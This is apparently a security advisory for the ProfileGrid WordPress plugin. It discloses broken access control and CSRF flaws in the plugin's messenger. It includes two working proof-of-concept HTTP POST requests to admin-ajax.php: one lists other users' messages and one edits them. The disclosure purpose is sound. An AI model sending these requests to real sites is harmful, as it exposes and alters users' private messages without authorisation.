The plugin was affected by Broken Access Control and Cross-Site Request Forgery (CSRF) vulnerabilities.
The plugin creates a frontend user profile, groups, communities and messenger. However, the messenger is vulnerable because there is no user authentication, so the vulnerability allows us to list and modify other users’ messages.
Proof of Concept
To list other users’ messages:
POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded
action=pm_messenger_show_messages&tid=1
To edit another user’s message:
POST /vdb/metagauss-profilegrid/wp-admin/admin-ajax.php HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded
action=pm_messenger_send_new_message&tid=1&rid=-&mid=1&content=message1%20from%20user1%20to%20user2%20(edited%20by%20spy)&_wpnonce=b5faed947c